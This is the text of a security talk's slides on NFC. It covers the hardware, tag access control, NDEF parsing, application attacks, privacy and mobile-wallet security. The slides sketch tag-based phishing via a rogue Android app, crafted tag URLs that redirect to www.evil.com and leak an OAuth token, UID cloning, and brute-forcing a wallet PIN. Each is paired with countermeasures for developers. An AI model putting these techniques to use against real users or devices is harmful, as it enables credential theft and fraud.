Corey Benninger Max Sobell
NFC Overview
What is NFC?
Hardware basics behind NFC
Antennas and waveforms
Tags and access control
NFC Data Exchange Format (NDEF) NFC Application Attacks Privacy Mobile Wallets
2
RFID technology ISO 14443-1:4 (13.56 MHz)
▪ Physical characteristics
▪ Radio frequency power and signal interface
▪ Initialization and anti-collision
▪ Transmission protocol
No encryption or access control! Devices: Powered: PCD, interrogator, reader, device
Unpowered: PICC, target, tag, transponder 3
http://www.mockingweb.com/wp-content/uploads/2011/11/Near-field-communcation.png
4
RFID:
125 KHz/13.56 MHz/900 MHz
NFC (what we’ll be focusing on):
A type of RFID
Short range (induction v backscatter)
Enough
computational
power to perform
basic crypto
5
6
!=
Don’t think of NFC like “proximity cards” Can mimic these, but often NFC is much more
complex.
NFC enabled posters.
7
8
9
Phone Hardware
Radio (ISO 14443)
Phone OS Software
Protocol: APDU, SNEP
Data: NDEF
Market Applications
Foursquare, DoubleTwist, PayPal, Park Mobile, etc…
10
Replace a traditional antenna with coils of wire
11 Samsung Nexus S
Samsung Galaxy Nexus (in the battery)
Energy one way, data two ways
12
http://www.eurasip.org/Proceedings/Ext/RFID2007/pdf/s1p4.pdf
Inductive Coupling Current device ranges severely limited (4-10 cm)
Near Field: wavelength (~20m) much longer than antenna diameter
Kristen Paget: 900 MHz read ranges > 66 meters
That is not NFC
NFC theoretically limited to ~10m
13
Encoding: ASK
Reader -> Tag: Modified Miller @ 100% ASK
Tag -> Reader: Manchester @ 10% ASK
Baudrates:
106 kbps, 212 kbps,
424 kbps, 848 kbps
14
15
16
Tag: 10% ASK Reader: 100% ASK
Each Tag has a UID – unique identifier
Serial number for card
▪ Locked on physical tags
▪ but not on a $80 Chinese-manufactured knock-off card
Can be cloned using an emulated card
More than just memory sectors
Reader sends requests to read and write data from tag
Tag can deny request based on access controls
17
Mifare Tags
If you want access control, go with DESFire EV1 (for now)
18
"Breaking Mifare DESFire MF3ICD40: Power Analysis and Templates in the Real World" by David Oswald and Christof Paar
Tags Locked for
Writing Access Control
Broken Year
Broken
Ultralight 1 0 0
Classic 1 1 1 2008
DESFire 1 1 1 2011
DESFire EV1 1 1 0
Phone Hardware
Radio (ISO 14443)
Phone OS Software
Protocol: APDU, SNEP
Data: NDEF
Market Applications
Foursquare, DoubleTwist, PayPal, Park Mobile, etc…
19
NDEF – NFC Data Exchange Format
Specs come from NFC Forum
▪ www.nfc-forum.org
NDEF Message contains NDEF Record(s)
Common record types
▪ Text
▪ URI ▪ 0x00 through 0x23 to map bytes to prefixes.
▪ Smart Poster ▪ Text and URIs
20
21
Decimal Hex Protocol
0 0x00 N/A. No prepending
1 0x01 http://www.
2 0x02 https://www.
3 0x03 http://
4 0x04 https://
5 0x05 tel://
… … …
11 0x0B smb://
12 0x0c nfs://
13 0x0d ftp://
27 0x1B tcpobex://
36-255 0x23 – 0xFF RFU
Section 3.2.2 of NFCForum URI 1.0 spec
D1 01 0D 55 05 2B 31 35 35 35 31 32 33 34 35 36 37 FE
D1: record begin
01: length of payload length
▪ 0D: payload length
▪ 55: payload type (URI)
▪ 05: payload identifier (tel:// prefix)
▪ 2B->37: payload (“+15551234567”)
FE: terminal value character
22
Google Tags Application crash*
NDEF Stack built in to Android
23 * On Gingerbread. Java level parsing crash, not exploitable
Phone Hardware
Radio (ISO 14443)
Phone OS Software
Protocol: APDU, SNEP
Data: NDEF
Market Applications
Foursquare, DoubleTwist, PayPal, Park Mobile, etc…
24
Collin Mulliner – (www.mulliner.org)
Python code for working with Nokia 6313 NFC and Nokia 6212 Classic
Francois Kooman, Roel Verdult
Using NFC to trigger bluetooth and file transfers
Nick von Dadelszen - (www.lateralsecurity.com)
Kiwicon 2011 -Mobile point of sales reader w/ RFIDOIT
25
Messing with posters
Access control set?
Read-only option?
Physical protection?
26
27
Altering data Use write locking or access control
Zapping/DoS ???
“Counterfeit” tags NFC Signature Record Type
Definition Technical Specification ▪ Each record is signed ▪ Issues with Franken-tags, cloning,
signature-checking...
White-list of UIDs ▪ Mgmt pains
28
Countermeasures
Blackberry requires two clicks to open URL
29
Push for Zero Click NFC integration Some URIs require no user interaction
▪ Contacts, URLs, Market
“Beam” data from device to device
▪ Pass NDEF messages instead of emulating tags ▪ Simple NDEF Exchange Protocol (SNEP)
30
31
What if the user does not need to click, only tap?
http://developer.android.com/guide/topics/nfc/nfc.html#ndef
Register a detailed intent filter in the app’s AndroidManifest.xml
No interaction needed when scanning a URL with http://local.google.com/maps
What prevents a malicious application from also requesting this intent?
32
We can craft our own icon and title for our registered intent filter
Can you tell which is the real maps application?
33
NOTE: See Android Application Records, introduced in Android 4.0 (API level 14) for countermeasure
AAR from Google:
“If no application can start with the AAR, go to the Android Market to download the application based on the AAR.”
Set Android Application Record
Our application in the market
Add our own tag (Bigger! On the front!)
Successfully phished!
34
The tag:
NDEF URL Record: http://porkmobile.com
AAR: com.porkmobile
The app:
Webview to our server
Collect: credit cards, logins, etc…
Countermeasures: In Google’s market…
35
Developing an app accepting NDEF data?
Treat the NDEF data as untrusted. Validate like any user supplied data.
Example: Foursquare added NFC check-ins.
http://m.foursquare.com/checkin?venueID=27016678&venueName=Time%20Square%20New%20York
36
VenueID was not validated to match VenueName before check-in was submitted
Can’t trust tag data
37
•Fixed in version: 2011.08.11 – removed NFC check-in •Collin Mulliner @ NinjaCon 2011
Don’t blindly pass a URL (or data) from a tag What if… Intent filter “api.foursquare.com”
Your user is persistently logged in
Expect “http://api.foursquare.com/checkin?venueId=1”
But get
▪ http:// api.foursquare.com/account/addfriend?userId=666
▪ http:// api.foursquare.com/redirect?domain=www.evil.com ▪ Is your authentication token added to the URL?
38
ERROR/VenueActivity(536): java.lang.IllegalArgumentException: Illegal character in path at index 42: https://api.foursquare.com/v2/venues/1/..\..\..\..\www.evil.com?oauth_token=4CXOTLA50WHDKOJUGS4GQQ1XBINTPX5DSCFSRVARFH5YXE0O&v=20110525
39
“NFCShortcuts” app on Blackberry never writes to the tags
Triggers based of UID
Limits the attack surface
40
41
NFC as a privacy concern?
Smartphone has all the megabits anyway, right?
Can be as good as GPS data
Reading a UID at a specific time, may put you at a specific location
Transaction data at a Point of Sales could be sensitive (you spent how much where?)
Who your friends are (or what devices your friends have)
42
Reading an NFC tag generates an intent
seen in logcat, but not recorded to file system
Default “Tags” app
Stores tag and timestamp
/data/data/com.google.android.tag/databases/tags.db
43
Data can be left behind on tags from previous writes Make sure to zero out or
format used tag NDEF terminal value
character, length fields ▪ Have to read sector by
sector
44
45
How do you protect credit card info on your phone from…
other software listening for NFC tags?
“droid dream” like malware and other rooted applications?
a stolen device? 46
Yo Dawg, I heard you like computers
▪ Runs a base operating system
▪ Embedded applications
▪ Simple communication interface
▪ Strong crypto and access control ▪ Pre-shared key known to the SE “owner”
Even if your device is rooted, you won’t have full access to the SE
47 http://code.google.com/p/seek-for-android/
From the “NFC Antenna” Be within the
physical NFC range
From other apps Signed with
NFCR or RESE keys on BB
Signed by Google*
48
http://supportforums.blackberry.com/t5/tkb/articleprintpage/tkb-id/java_dev@tkb/article-id/623
* Unless rooted device or 3rd party SE
APDU - Application Protocol Data Unit (ISO7816-4)
Defines the communication between OS applications to applets in the Secure Element
BH08 - Ivan Buetler “SmartCard APDU Analysis”
Google Wallet Example send: 00 A4 04 00 00
▪ 5 bytes (SELECT [default CardManager])
recv: 6F 65 84 08 A0 00 00 00 03 00 00 00 ... 90 00 ▪ “90 00” - OK
49
Free $10 for contactless payments
Early build - lots of debug code
▪ BS Bank
▪ <- Debug Menu
ViaForensics post stored data
Can work on a NS 4G or NS or Galaxy Nexus (thanks XDA!)
▪ Non-root builds means signed by Google
50
http://intrepidusgroup.com/insight/2011/09/ a-brave-new-wallet-first-look-at-decompiling-google-wallet/
Zvelo team disclosed Google Wallet PIN is not stored in the secure element Physical access of the device needed for abuse On a rooted device
▪ The PIN can be brute forced (10,000 possibilities < 5 sec)
51 https://zvelo.com/blog/entry/google-wallet-security-pin-exposure-vulnerability
Don’t trust your user-land application
Keep payment secrets in the secure element
Keep lockout counts in the secure element
Do sensitive operations in the secure element
▪ Pin verification
Treat the bus to the secure element as insecure
“Hidden” APDUs will be found
▪ By monitoring or fuzzing
52
What about a “Tap” attack with a compromised point of sales reader? Pablos Holman’s
boingboing type “use the reader” hack
53
http://tv.boingboing.net/2008/03/19/how-to-hack-an-rfide.html
For Android: The NFC antenna in your phone is only activated when the
screen is powered on*
54
* For Google Nexus devices, although some NFC chips may work in “low power” or “no power” modes.
Blackberry w/ NFC: The default is to ALLOW card emulation when LOCKED or POWERED OFF! *
55
* The BB Device does not appear to “read” or take actions on tags in locked or powered off modes
Holman’s tap works to grab your own Google Wallet number… if your device is on, unlocked, passcode entered, and before it times out
ie: good countermeasures against IRL attacks
56
57
Positives
Can disable the radio
▪ (can’t turn off physical cards)
GPS to find my credit card
Easier to see transaction history
▪ Or current balances
Gives you more security control than physical cards
▪ Device passcode
NFC: it can be another vector to mobile devices and apps
Developers beware! Untrusted data!
Pen-Testers: It’s just getting started…
Questions?
58
Thank you to: Jason Ross @ IG, Collin @ www.mulliner.org, RFnoID @ Stevens
Our Blog http://www.intrepidusgroup.com/insight
@0xbenn @msobell